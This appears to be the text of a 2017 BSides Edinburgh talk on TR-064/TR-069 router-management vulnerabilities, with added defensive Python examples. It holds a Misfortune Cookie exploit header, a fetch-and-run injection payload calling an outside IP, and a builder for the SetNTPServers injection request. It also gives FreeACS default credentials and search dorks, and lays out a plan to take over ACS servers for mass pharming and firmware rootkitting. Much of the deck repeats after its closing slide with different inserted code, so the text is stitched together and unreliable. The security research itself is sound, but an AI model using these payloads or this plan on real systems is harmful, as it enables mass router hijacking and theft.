TR-06FAIL
AND OTHER CPE CONFIGURATION MANAGEMENT DISASTERS
ABOUT.ME
• Security Researcher at Xiphos Research
• Been poking embedded stuff with a pointy stick for ages.
• Formerly: Forensics student, pharmaceuticals student, internet miscreant…
• “Proper Bad Dodgy”, “Unprofessional”, “Childish”, “A bad influence”…
WHAT WE WILL BE TALKING ABOUT
• The TR-064 Protocol – and related vulnerabilities (TR-06FAIL, etc…)
• The TR-069 Protocol – and related vulnerabilities (Misfortune Cookie, etc…)
• Hacking ACS Servers for World Domination.
• Other Stuff in No Particular Order.
BEFORE WE BEGIN
• See the excellent prior art on this subject by Shahar Tal.
• “I Hunt TR-069 Admins” and the “Misfortune Cookie” research.
• Also, it’s worth reading the specs I link to and trying some of this for yourself.
FIRSTLY, A PRIMER ON TR-XXX
• TR-XXX are DSL Forum Specifications.
• Basically, they define specifications for protocols and such to manage broadband networks, for ISPs to follow/implement/ignore.
• Of interest today are TR-064 and TR-069, but there are many others…
TR-064
• TR-064 is “LAN-Side DSL CPE Configuration”.
• The specification outlines a SOAP-based protocol to allow configuration of CPE devices from the LAN side, for example by “Broadband Setup” software shipped to consumers.
• https://www.broadband-forum.org/technical/download/TR-064.pdf
TR-069
• “CPE WAN Management Protocol” (CWMP)
• Outlines the protocol for management of CPE devices over the WAN. Also SOAP-based, and disgustingly complicated at first glance.
• https://www.broadband-forum.org/technical/download/TR-069_Amendment-5.pdf (yes, it’s on version 5…)
LET’S TALK ABOUT TR-064 A BIT…
• TR-064 allows managing ANY setting on a CPE device.
• (provided you are on the LAN side of the device…)
• Has total read/write access to the full device configuration:
• ACS Configuration (for TR-069 access…)
• DNS settings…
• Wireless Security settings…
• Actually comes with some “security” requirements…
TR-064 SECURITY SPECIFICATIONS
• “Access to any action that allows configuration changes to the CPE MUST be password protected.”
• “Access to any password-protected action MUST require HTTP digest authentication.”
• “Sensitive information, such as passwords, MUST NOT be readable at all.”
• It’s also only meant to listen on the LAN interface…
TR-064 SECURITY REALITIES, OR “TR-06FAIL”
• Password Protected? Oh hell no!
• Actual credentials (WiFi keys…) readable in plaintext? Oh hell yes!
• Accessible via the internet? Oh hell yes!
• BONUS TRIVIAL COMMAND INJECTION VULN? WHY NOT?!
SO WHAT IS THE OBVIOUS OUTCOME OF THIS?
WELL, DEUTSCHE TELEKOM HAD SOME ISSUES…
AS DID TALKTALK… AND POST OFFICE… ETC…
Everyone had a bad time with this… TalkTalk, Eircom, Post Office, Demon, etc…
SO, WHO DID IT?
WHERE IS THE ATTRIBUTION PARTY?
NATURALLY, SKIDDIES…
I know you can’t actually read this. But it’s the source code of one of the TR-064 exploits that script kiddies are using to spread malware…
The important part is:
<NewNTPServer1>
`commands here`
</NewNTPServer1>
… Trivial command injection.
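The injection above works because the NTP server value is handed to a shell with no check on its shape. What a CPE firmware (or a LAN-side IDS) should do instead is treat the SetNTPServers arguments as data with a known grammar: an empty slot, an IP literal, or a DNS hostname, and nothing else. The following is an added example, not code from the talk or from any vendor firmware; the SOAP envelope shape, the `urn:dslforum-org:service:Time:1` service URN and the `NewNTPServer1`..`5` argument names are assumptions about the TR-064 Time service, and both request bodies are constructed samples.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET
from typing import List

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
TIME_NS = "urn:dslforum-org:service:Time:1"   # assumed TR-064 Time service URN

# Constructed sample: a well-formed SetNTPServers request.
GOOD_REQUEST = b"""<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
      <NewNTPServer1>ntp.example.org</NewNTPServer1>
      <NewNTPServer2>192.0.2.10</NewNTPServer2>
    </u:SetNTPServers>
  </s:Body>
</s:Envelope>"""

# Constructed sample in the shape the deck describes: shell metacharacters
# where a hostname belongs. The command itself is a harmless placeholder.
BAD_REQUEST = b"""<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
      <NewNTPServer1>`placeholder_command`</NewNTPServer1>
    </u:SetNTPServers>
  </s:Body>
</s:Envelope>"""

# One RFC 1123 hostname label: alphanumerics and '-', not starting/ending with '-'.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_ntp_server(value: str) -> bool:
    """Whitelist, not blacklist: empty (clears the slot), an IPv4/IPv6 literal,
    or a hostname built from valid labels. Every shell metacharacter fails
    this test by construction, so nothing has to be 'escaped'."""
    if value == "":
        return True
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    if len(value) > 253:
        return False
    return all(_LABEL.match(label) for label in value.rstrip(".").split("."))


def extract_ntp_servers(body: bytes) -> List[str]:
    """Pull NewNTPServer1..5 out of a SetNTPServers envelope, in slot order."""
    root = ET.fromstring(body)
    action = root.find(f".//{{{SOAP_NS}}}Body/{{{TIME_NS}}}SetNTPServers")
    if action is None:
        raise ValueError("not a SetNTPServers request")
    servers = []
    for n in range(1, 6):
        el = action.find(f"NewNTPServer{n}")
        if el is not None:
            servers.append((el.text or "").strip())
    return servers


def validate_set_ntp_request(body: bytes) -> List[str]:
    """Return the server list if every slot passes the grammar; raise otherwise.
    Only values returned from here may be written to the device's NTP config."""
    servers = extract_ntp_servers(body)
    bad = [s for s in servers if not is_valid_ntp_server(s)]
    if bad:
        raise ValueError(f"rejected NTP server value(s): {bad!r}")
    return servers


def is_safe_set_ntp_request(body: bytes) -> bool:
    """Boolean form of the check, handy for an IDS rule or a unit test."""
    try:
        validate_set_ntp_request(body)
        return True
    except (ValueError, ET.ParseError):
        return False


if __name__ == "__main__":
    print("accepted:", validate_set_ntp_request(GOOD_REQUEST))
    print("blocked:", not is_safe_set_ntp_request(BAD_REQUEST))
```

Even with this check in place, the value should be passed to the NTP client as an argument vector rather than interpolated into a shell command line; the whitelist removes the injection, the argv call removes the shell. A LAN-side sensor can run the same `is_safe_set_ntp_request` over captured TR-064 POST bodies to flag exploitation attempts against devices that have not been patched.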
THIS WAS NOT THE FIRST TIME, EITHER…
• Before TR-06FAIL happened, we had Misfortune Cookie.
• Affected the same RomPager server.
• Affected the TR-069 component.
• Allowed remotely accessing the device without authentication, due to what was effectively a write-what-where kind of issue.
MISFORTUNE COOKIE TL;DR
• Allows overwriting internal state variables on the TR-069 service on the router.
• Below is from a PoC by Kenzo; it exploits the Eircom "P-660HW-T1 v3".
• #Bypass the CWMP port check. Bypass the password check
• headers = {"Cookie": "C88605=AAAAAAAA;C107257012=\x08\x0b\x27\x19\x66\x40\xb0\x21;C107257012=\x08\x0b\x27\x19"}
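The tell in that PoC is the cookie itself: RomPager's `C<digits>` cookies are meant to carry printable session data, and a value full of control and 8-bit bytes is a memory write, not a session. That makes Misfortune Cookie attempts easy to spot on the wire or in a WAN-side proxy log. The following detector is an added example (not from the talk or from Kenzo's PoC); the only things taken from the PoC are the `C<digits>=` naming pattern and the sample cookie bytes, which are embedded here in a constructed HTTP request.

```python
import re
from typing import List, Optional

# Constructed sample requests (not captures from the talk).
BENIGN = (b"GET / HTTP/1.1\r\n"
          b"Host: 192.0.2.1\r\n"
          b"Cookie: session=abc123; lang=en\r\n\r\n")

# Same cookie bytes as the PoC quoted above, wrapped in a constructed request.
SUSPECT = (b"GET /cwmp HTTP/1.1\r\n"
           b"Host: 192.0.2.1\r\n"
           b"Cookie: C88605=AAAAAAAA;C107257012=\x08\x0b\x27\x19\x66\x40\xb0\x21;"
           b"C107257012=\x08\x0b\x27\x19\r\n\r\n")

# RomPager-style cookie names: the letter C followed by digits.
_ROMPAGER_NAME = re.compile(rb"^C\d+$")


def _cookie_header(raw: bytes) -> Optional[bytes]:
    """Return the value of the first Cookie: header in a raw HTTP request."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"cookie":
            return value.strip()
    return None


def _has_binary(value: bytes) -> bool:
    """True if any byte is outside printable ASCII (0x20..0x7e)."""
    return any(b < 0x20 or b > 0x7e for b in value)


def suspicious_cookies(raw: bytes) -> List[str]:
    """Names of C<digits> cookies whose value carries non-printable bytes.
    A legitimate RomPager session cookie never needs those, so a hit is a
    strong signal of a Misfortune-Cookie-style state overwrite attempt."""
    header = _cookie_header(raw)
    if header is None:
        return []
    hits = set()
    for pair in header.split(b";"):
        name, _, value = pair.strip().partition(b"=")
        if _ROMPAGER_NAME.match(name) and _has_binary(value):
            hits.add(name.decode("ascii"))
    return sorted(hits)


if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, "->", suspicious_cookies(req) or "clean")
```

The check is deliberately narrow so it can run inline at line rate: it does not try to decode what the overwritten state means, only whether a cookie that should be text is being used to smuggle bytes. The longer-term fix is the one the deck implies, namely not exposing the CWMP listener (or TR-064) to the WAN at all, and keeping RomPager-based firmware patched.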
LET’S TALK ABOUT TR-069…
• Another DSL Forum Specification.
• Has a bit about security in it.
• Supports TLS! And Authentication!
• Protocol is a total fucking mess. “Designed by Committee” kind of crap.
TR-069…
• SSL/TLS is totally optional.
• Some setups are super solid, with mutual auth (client-side certs, pinning…), others are plaintext.
• Authentication? Also kind of optional.
• CPE to ACS often uses basic-auth… Kinda. It often uses the “username” as an identifier.
• ACS to CPE is often TLS (client cert) but can be shared secret without TLS.
TR-069…
• Lots of XML trash in the protocol.
• Built on STUN and SOAP, and there are parts of it that use XMPP…
• Attack surface is immense.
SO, WE KNOW THE CPE END IS A CROCK OF SHIT.
• What about the ISP end?
• Surely the ISP are securing their servers very, very well?
• Surely the ISP ACS software is ROCK SOLID ENTERPRISE SOFTWARE!?!?
• Surely TR-069 can’t be as bad as you say, right?
AND NOW FOR THE SECOND ACT
IN WHICH WE GO HACK THE PLANET.
WORLD DOMINATION.
WORLD DOMINATION
• So, say we wanted to hack CPE devices en masse.
• But we did not feel particularly inclined to actually go hack them one at a time, even with botnet/scanning/etc…
• We want to do them all in one go…
I DECIDED TO START AUDITING ACS SERVERS.
• Hacking an ACS server is way quicker than hacking millions of CPEs one at a time.
• Auditing has gone slowly. Free time project.
• In today’s talk, we discuss some hilarious 0day in FreeACS.
DISCLOSURE TIMELINE(S)
• At some point in the last while: Found bugs in FreeACS
• Between then and now: Worked on weaponizing Said Bugs.
• Today: Public Disclosure of Said Bugs.
FREEACS
• FreeACS has been around for absolutely ages.
• Seems to be maintained by one person, maybe a small group…
• Technologies Used:
• Apache Tomcat (ew, Java)
• MySQL
FREEACS
• “The Most Complete TR-069 ACS available for free under the MIT License.”
• Most Complete = Most Attack Surface.
• I don’t think I have even scratched the surface here…
WHY FREEACS? WELL, THIS SMELLS FUNNY…
LOWEST HANGING FRUIT
• Default Login Credentials: admin/xaps (do people change this?)
• Shodan: title:FreeACS
• Google: intitle:”FreeACS Web Web”
• Try Censys.io, Bing, etc… Scan some ports… Etc.
POST-AUTH IS MADE OF XSS WITH OPTIONAL ACS
• Found a bunch of reflected XSS vulns post-auth.
• Pretty much every parameter ever will reflect some XSS.
• Post-Auth, so who cares, but have some screenshots anyway…
WE WANT THE FOLLOWING THINGS…
• Pre-Authentication (can’t rely on cracking a login or default credentials)
• Remote (exploitable over the internet.)
• Privileged Access (gives us “Admin” role on the ACS server)
• Easy (because, let’s face it, we want to do world domination on the cheap!)
WHAT’S THE PRE-AUTH ATTACK SURFACE?
• Well, it’s pretty huge.
• Easiest is to attack from the perspective of a TR-069 client.
• So I set about creating a valid CWMP Notify message to send.
XML HELL
WE TRIED FUZZING THE XML…
• I got my testing instance to cease responding a bunch of times.
• I got bored really, really fast.
• So I thought back to “is there something else I can attack here?”
TR-069/CWMP NOTIFY MESSAGES
• So there’s the XML.
• What is missing in that example is the auth.
• It uses Basic Auth.
CWMP NOTIFY AND BASIC AUTH.
• Turns out the HTTP Basic Auth “username” is used to denote which device.
• Used as a unique identifier.
• So it’s input into things and messed with… And Basic Auth is a loose spec of user input…
THE POSSIBLY UNEXPLOITABLE…
• TL;DR: The Basic-Auth username is passed into a SQL query with no sanitizing.
• It leads to a fairly trivial SQL injection vulnerability (in theory).
• However, there is a char-length limit that meant I couldn’t get anything working easily. Someone else might figure it out.
• You CAN cause a perma-DoS of the ACS, however, with a broken SQL statement…
THE EASILY EXPLOITABLE
• Username is totally unsanitized.
• Username shows up in the UI a load of times when doing ACS admin things.
• So maybe we can get some nice XSS?
PERSISTENT XSS IN ADMIN
• TL;DR it worked.
• Persistent XSS in admin area via a CWMP Notify Message.
• Some payload limitations – char length and the likes…
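Both the "possibly unexploitable" SQL injection and the persistent XSS above come from the same root cause: the Basic-Auth username is an attacker-chosen string that the ACS uses as a device identifier, and it reaches the database and the admin UI unchanged. The hardened handling is three independent layers: a whitelist on the identifier's shape, a parameterised query, and output encoding in the UI, so that a failure of any one layer is still caught by the others. The following is an added example written for this talk's material, not FreeACS's own code; the `unit` table, its columns, the identifier format and the sample credentials are all constructed, and the functions are hypothetical names.

```python
import base64
import hmac
import html
import re
import sqlite3
from typing import Optional, Tuple

# Constructed stand-in for the ACS's device inventory (hypothetical schema).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE unit (unit_id TEXT PRIMARY KEY, secret TEXT, profile TEXT)")
    conn.executemany(
        "INSERT INTO unit VALUES (?, ?, ?)",
        [("000000-CPE-0001", "s3cret-one", "default"),
         ("000000-CPE-0002", "s3cret-two", "vip")],
    )
    return conn


def basic_header(user: str, password: str) -> str:
    """Build an Authorization header value; used to construct test input."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def parse_basic_auth(header: str) -> Tuple[str, str]:
    """Decode 'Basic base64(user:pass)'. RFC 7617 only forbids ':' in the
    user-id; every other byte is attacker-chosen, so callers must not assume
    the username has any particular shape."""
    scheme, _, blob = header.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not Basic auth")
    decoded = base64.b64decode(blob, validate=True).decode("utf-8")
    user, sep, password = decoded.partition(":")
    if not sep:
        raise ValueError("malformed credentials")
    return user, password


# Layer 1: device identifiers have a narrow known shape; enforce it before
# the value reaches SQL, the UI, or a log line.
_UNIT_ID = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def lookup_unit(conn: sqlite3.Connection, unit_id: str) -> Optional[Tuple[str, str]]:
    """Layer 2: parameterised query. The driver sends unit_id as data, so a
    quote or comment sequence in it is matched literally, never parsed."""
    return conn.execute(
        "SELECT secret, profile FROM unit WHERE unit_id = ?", (unit_id,)
    ).fetchone()


def authenticate_inform(conn: sqlite3.Connection, auth_header: str) -> Optional[str]:
    """Authenticate a CWMP Inform/Notify: whitelist, parameterised lookup,
    then a constant-time secret compare. Returns the unit id or None."""
    try:
        unit_id, password = parse_basic_auth(auth_header)
    except ValueError:
        return None
    if not _UNIT_ID.match(unit_id):
        return None
    row = lookup_unit(conn, unit_id)
    if row is None or not hmac.compare_digest(row[0].encode(), password.encode()):
        return None
    return unit_id


def render_unit_cell(unit_id: str) -> str:
    """Layer 3: output encoding for the admin UI. Whatever did reach the
    database is escaped on the way out, so a stored '<script>' renders as text."""
    return html.escape(unit_id)


if __name__ == "__main__":
    db = make_db()
    print(authenticate_inform(db, basic_header("000000-CPE-0001", "s3cret-one")))
    print(authenticate_inform(db, basic_header("<script>alert(1)</script>", "x")))
    print(render_unit_cell("<script>alert(1)</script>"))
```

The whitelist is what stops the persistent XSS at the door and sidesteps the char-length question entirely, but it is the parameterised query and the output encoding that keep the ACS safe on the day someone needs a wider identifier format and loosens the regex. Rejected Informs are also worth logging with the decoded username escaped, since the same string will otherwise end up injected into whatever viewer reads the logs.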
POC – ALERT(“XSS”) PAYLOAD
POC – INJECTING A REMOTE SCRIPT…
SO WE CAN INJECT REMOTE JS INTO ADMIN…
• Now let’s fully take over the ACS…
• I figured the easiest way to do this is to add a new admin user…
• So let’s look at how that plays out…
ADDING A NEW ADMIN USER
• It is just a POST request.
• No CSRF tokens or XSS protection going on here.
• We can do this in JavaScript we copied and pasted from Stack Overflow!
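The add-user POST is a state-changing request that accepts whatever the browser sends, which is why script running in the admin's session can drive it. The standard mitigation is a per-session CSRF token that the form must echo back and the server verifies before touching the user table. The following is an added example, not FreeACS's code; the form field names, the session identifier and the handler are hypothetical, and the server key is generated in-process purely so the example runs stand-alone.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Tuple

# Constructed for the example: in a deployment this comes from the ACS's
# configuration/keystore and is never hard-coded or regenerated per request.
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id: str, key: bytes = SERVER_KEY) -> str:
    """Derive the token from the session id with a keyed hash, so a token is
    only valid for the session it was issued to and cannot be forged without
    the server key. Embed the result in the add-user form as a hidden field."""
    return hmac.new(key, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, token: str, key: bytes = SERVER_KEY) -> bool:
    """Constant-time comparison against the token this session should carry."""
    return hmac.compare_digest(issue_csrf_token(session_id, key), token)


def handle_add_user(form: Dict[str, str], session_id: str) -> Tuple[int, str]:
    """The add-user POST with the check the deck says is missing. Order
    matters: the token is verified before any validation or database write,
    so a forged request is refused without side effects."""
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    username = form.get("username", "").strip()
    if not username:
        return 400, "username required"
    # (database insert would happen here)
    return 200, f"user {username} added"


if __name__ == "__main__":
    sid = "admin-session-A"
    tok = issue_csrf_token(sid)
    print(handle_add_user({"username": "newadmin"}, sid))
    print(handle_add_user({"username": "newadmin", "csrf_token": tok}, sid))
```

One caveat that matters for this talk: a CSRF token only stops requests forged from another origin. The deck's attack runs JavaScript inside the admin page itself, which can read the token out of the form and replay it, so the token is a second line of defence behind fixing the stored XSS, not a substitute for it. `SameSite` session cookies and re-prompting for the admin password on privilege-granting actions narrow the window further.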
ADDING ADMIN USER VIA XSS POC…
ADDING ADMIN USER VIA XSS POC
ADMIN USER NAMED HACKER ADDED ;)
SO… WHAT DO…
• Scan Internet/Shodan/Censys/Google for FreeACS Servers.
• Inject our XSS via CWMP NOTIFY message.
• Wait a while for payloads to fire…
• Hack the Planet!
WHAT WE CAN DO WITH HACKED ACS?
• We can reconfigure settings on all clients (think: all users of the ISP)
• Change everyone’s DNS servers for a mass pharming attack or worse :D
• We can reflash firmwares on all clients – persistent mass rootkitting.
• Imagine the cleanup costs of this?
• We can probably mess with billing or provision new devices, perhaps…
WITH A BIT OF HACKED ACS… WE ARE LIKE THIS!
THANKS
• BSides Edinburgh Organizers!
• Shahar Tal, kenzo, and others for the prior-art.
• Coworkers and friends (LizardHQ, etc…) for helping
• Cybergibbons and Ken from PTP
• The DSL Forum, for writing hilarious specs.
• Vendors and software developers for keeping me in a job.
• You, for putting up with this utter nonsense.
YOU MAY SUBSCRIBE TO MY NEWSLETTER
• Email (which constantly goes unanswered):
darren.martyn@xiphosresearch.co.uk
• XMPP (will be ignored if you don’t use OTR…):
infodox@jabber.ccc.de
• Twitter (actually might get a response!)
@info_dox
• mastodon.social (the new super hip not-twitter thing)
@lsd

BSides Edinburgh 2017 - TR-06FAIL and other CPE Configuration Disasters

TR-064 SECURITY SPECIFICATIONS
• “Access to any action that allows configuration changes to the CPE MUST be password protected.”
• “Access to any password-protected action MUST require HTTP digest authentication.”
• “Sensitive information, such as passwords, MUST NOT be readable at all.”
• It’s also only meant to listen on the LAN interface…
TR-064 SECURITY REALITIES, OR “TR-06FAIL”
• Password protected? Oh hell no!
• Actual credentials (WiFi keys…) readable in plaintext? Oh hell yes!
• Accessible via the internet? Oh hell yes! (The service was reachable on the WAN side on TCP port 7547, the same port the device uses for TR-069 connection requests.)
• BONUS TRIVIAL COMMAND INJECTION VULN? WHY NOT?!
SO WHAT IS THE OBVIOUS OUTCOME OF THIS?
WELL, DEUTSCHE TELEKOM HAD SOME ISSUES…
• (The November 2016 outage: a Mirai variant probing TR-064 on port 7547 knocked roughly 900,000 Speedport routers offline.)
AS DID TALKTALK… AND POST OFFICE… ETC…
• Everyone had a bad time with this… TalkTalk, Eircom, Post Office, Demon, etc…
SO, WHO DID IT? WHERE IS THE ATTRIBUTION PARTY?
NATURALLY, SKIDDIES…
• I know you can’t actually read this. But it’s the source code of one of the TR-064 exploits that script kiddies are using to spread malware…
• The important part is:
  <NewNTPServer1> `commands here` </NewNTPServer1>
• … Trivial command injection: the NewNTPServer1 value is spliced straight into a shell command line on the device, so the backticks get evaluated.
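
The injection above, end to end, as an added example (not the skiddie script from the slide, and not any vendor’s firmware): the SOAP request a TR-064 client sends for SetNTPServers, a hypothetical CPE-side handler that builds a shell command the way the vulnerable firmware evidently did, and the hardened form. Assumptions: the /UD/act?1 endpoint, the Time:1 service URN, and the ‘ntpclient’ binary name; the payload and IP are constructed. Neither handler executes anything; both return what they would run.

```python
"""TR-064 SetNTPServers: request builder plus a vulnerable and a hardened
CPE-side handler.  Added example for this write-up, not code from the talk
or from any vendor firmware.  Assumed: the /UD/act?1 endpoint, the Time:1
service URN and the hypothetical 'ntpclient' binary the handler invokes."""
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
TIME_NS = "urn:dslforum-org:service:Time:1"
SOAP_ACTION = f"{TIME_NS}#SetNTPServers"

# Constructed payload in the shape of the one on the slide: once the value is
# spliced into a shell command line, the backticks make sh run what is inside.
PAYLOAD = "`cd /tmp;wget http://198.51.100.7/bot;sh bot`"


def build_set_ntp_request(server: str) -> tuple[dict, str]:
    """HTTP headers and SOAP body for a TR-064 SetNTPServers call.
    The target URL (e.g. http://<cpe>:7547/UD/act?1) is chosen by the caller."""
    headers = {
        "Content-Type": 'text/xml; charset="utf-8"',
        "SOAPAction": f'"{SOAP_ACTION}"',
    }
    servers = "".join(
        f"<NewNTPServer{i}>{escape(server) if i == 1 else ''}</NewNTPServer{i}>"
        for i in range(1, 6)
    )
    body = (
        '<?xml version="1.0"?>'
        f'<s:Envelope xmlns:s="{SOAP_NS}" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        f'<s:Body><u:SetNTPServers xmlns:u="{TIME_NS}">{servers}'
        "</u:SetNTPServers></s:Body></s:Envelope>"
    )
    return headers, body


def extract_ntp_server(body: str) -> str:
    """What the CPE's SOAP layer hands to the action handler."""
    root = ET.fromstring(body)
    node = root.find(f".//{{{TIME_NS}}}SetNTPServers/NewNTPServer1")
    if node is None:
        raise ValueError("no NewNTPServer1 argument")
    return node.text or ""


def vulnerable_handler(body: str) -> str:
    """Firmware-style handler: splices the value into a command line destined
    for system()/sh -c.  Returns the line instead of executing it."""
    return f"ntpclient -h {extract_ntp_server(body)} -s"


# RFC 1123 hostname (also matches a dotted-quad IPv4); nothing else is allowed.
HOST_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def hardened_handler(body: str) -> list[str]:
    """Allow-list the value and build an argv list: no shell ever sees it,
    and anything that is not a hostname is rejected outright."""
    server = extract_ntp_server(body)
    if not HOST_RE.match(server):
        raise ValueError(f"rejected NTP server value: {server!r}")
    return ["ntpclient", "-h", server, "-s"]


def hardened_rejects(body: str) -> bool:
    """True when the hardened handler refuses the request."""
    try:
        hardened_handler(body)
    except ValueError:
        return True
    return False
```

The spec’s digest-auth requirement would not have saved this device: the bug is in what the handler does with a syntactically valid argument, so the fix is the allow-list plus an argv call rather than a shell string, with authentication as a separate layer in front of it.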
THIS WAS NOT THE FIRST TIME, EITHER…
• Before TR-06FAIL happened, we had Misfortune Cookie.
• Affected the same RomPager server.
• Affected the TR-069 component.
• Allowed remotely accessing the device without authentication, due to what was effectively a write-what-where kind of issue.
MISFORTUNE COOKIE TL;DR
• Allows overwriting internal state variables on the TR-069 service on the router.
• Below is from a PoC from Kenzo, exploits Eircom “P-660HW-T1 v3”.
• # Bypass the CWMP port check. Bypass the password check
• headers = {"Cookie": "C88605=AAAAAAAA;C107257012=\x08\x0b\x27\x19\x66\x40\xb0\x21;C107257012=\x08\x0b\x27\x19"}
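
What that cookie header looks like from the detection side, as an added example (not Kenzo’s PoC and not any vendor signature): RomPager names its cookies C<n> and uses n as an array index, so a request to the management port with an absurd index, or with raw bytes in the value, is the tell. The sample requests are constructed; the first reuses the cookie string from the slide. The assumption that a legitimate index never exceeds 9 is mine and should be tuned to the device.

```python
"""Detection for Misfortune Cookie-style requests.  Added example, not code
from the talk or the PoC.  Assumed: a legitimate RomPager cookie index never
exceeds LEGIT_MAX_INDEX; the sample requests below are constructed."""
import re
from dataclasses import dataclass

ROMPAGER_COOKIE = re.compile(rb"^C(\d+)$")
LEGIT_MAX_INDEX = 9              # assumption, tune to the device's cookie count
PRINTABLE = set(range(0x20, 0x7F))


@dataclass
class Finding:
    name: str
    index: int
    reasons: tuple


def cookie_pairs(raw_request: bytes) -> list[tuple[bytes, bytes]]:
    """(name, value) pairs from every Cookie header of a raw HTTP request.
    Parsed by hand on bytes; http.cookies would choke on the raw payload."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split(b"\r\n"):
        if not line.lower().startswith(b"cookie:"):
            continue
        for item in line[len(b"cookie:"):].split(b";"):
            name, _, value = item.strip().partition(b"=")
            if name:
                pairs.append((name, value))
    return pairs


def inspect_request(raw_request: bytes) -> list[Finding]:
    """One Finding per C<n> cookie that is out of range or carries raw bytes."""
    findings = []
    for name, value in cookie_pairs(raw_request):
        m = ROMPAGER_COOKIE.match(name)
        if not m:
            continue
        index = int(m.group(1))
        reasons = []
        if index > LEGIT_MAX_INDEX:
            reasons.append("out-of-range cookie index")
        if any(b not in PRINTABLE for b in value):
            reasons.append("non-printable bytes in value")
        if reasons:
            findings.append(Finding(name.decode(), index, tuple(reasons)))
    return findings


def is_misfortune_cookie_attempt(raw_request: bytes) -> bool:
    return bool(inspect_request(raw_request))


# Constructed samples.  The first carries the cookie string from the slide.
POC_REQUEST = (
    b"GET / HTTP/1.1\r\nHost: 192.0.2.1:7547\r\n"
    b"Cookie: C88605=AAAAAAAA;C107257012=\x08\x0b\x27\x19\x66\x40\xb0\x21;"
    b"C107257012=\x08\x0b\x27\x19\r\n\r\n"
)
BENIGN_REQUEST = (
    b"GET / HTTP/1.1\r\nHost: 192.0.2.1:7547\r\n"
    b"Cookie: C0=ab12cd; lang=en\r\n\r\n"
)
```

Run it over pcap extracts or proxy logs for port 7547; the index check alone already flags both cookies in the PoC, and the raw-byte check catches the one that actually carries the write.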
LET’S TALK ABOUT TR-069…
• Another DSL Forum (now Broadband Forum) specification.
• Has a bit about security in it.
• Supports TLS! And authentication!
• Protocol is a total fucking mess. “Designed by committee” kind of crap.
TR-069…
• SSL/TLS is totally optional.
• Some setups are super solid, with mutual auth (client-side certs, pinning…), others are plaintext.
• Authentication? Also kind of optional.
• CPE to ACS often uses Basic auth… kinda. It often uses the “username” as an identifier.
• ACS to CPE is often TLS (client cert) but can be shared secret without TLS.
TR-069…
• Lots of XML trash in the protocol.
• Built on SOAP over HTTP, with STUN for UDP connection requests, and there are parts of it that use XMPP…
• Attack surface is immense.
SO, WE KNOW THE CPE END IS A CROCK OF SHIT.
• What about the ISP end?
• Surely the ISP are securing their servers very, very well?
• Surely the ISP ACS software is ROCK SOLID ENTERPRISE SOFTWARE!?!?
• Surely TR-069 can’t be as bad as you say, right?
AND NOW FOR THE SECOND ACT IN WHICH WE GO HACK THE PLANET.
WORLD DOMINATION
• So, say we wanted to hack CPE devices en masse.
• But we did not feel particularly inclined to actually go hack them one at a time, even with botnet/scanning/etc…
• We want to do them all in one go…
I DECIDED TO START AUDITING ACS SERVERS.
• Hacking an ACS server is way quicker than hacking millions of CPEs one at a time.
• Auditing has gone slowly. Free-time project.
• In today’s talk, we discuss some hilarious 0day in FreeACS.
DISCLOSURE TIMELINE(S)
• At some point in the last while: found bugs in FreeACS.
• Between then and now: worked on weaponizing said bugs.
• Today: public disclosure of said bugs.
FREEACS
• FreeACS has been around for absolutely ages.
• Seems to be maintained by one person, maybe a small group…
• Technologies used:
  • Apache Tomcat (ew, Java)
  • MySQL
FREEACS
• “The Most Complete TR-069 ACS available for free under the MIT License.”
• Most complete = most attack surface.
• I don’t think I have even scratched the surface here…
WHY FREEACS? WELL, THIS SMELLS FUNNY…
LOWEST HANGING FRUIT
• Default login credentials: admin/xaps (do people change this?)
• Shodan: title:FreeACS
• Google: intitle:”FreeACS Web Web”
• Try Censys.io, Bing, etc… Scan some ports… Etc.
POST-AUTH IS MADE OF XSS WITH OPTIONAL ACS
• Found a bunch of reflected XSS vulns post-auth.
• Pretty much every parameter ever will reflect some XSS.
• Post-auth, so who cares, but have some screenshots anyway…
WE WANT THE FOLLOWING THINGS…
• Pre-authentication (can’t rely on cracking a login or default credentials)
• Remote (exploitable over the internet)
• Privileged access (gives us the “Admin” role on the ACS server)
• Easy (because, let’s face it, we want to do world domination on the cheap!)
WHAT’S THE PRE-AUTH ATTACK SURFACE?
• Well, it’s pretty huge.
• Easiest is to attack from the perspective of a TR-069 client.
• So I set about creating a valid CWMP Inform (the message a CPE opens its session to the ACS with; these slides call it a “Notify” message) to send.
WE TRIED FUZZING THE XML…
• I got my testing instance to cease responding a bunch of times.
• I got bored really, really fast.
• So I thought back to “is there something else I can attack here?”
TR-069/CWMP NOTIFY MESSAGES
• So there’s the XML.
• What is missing in that example is the auth.
• It uses Basic auth.
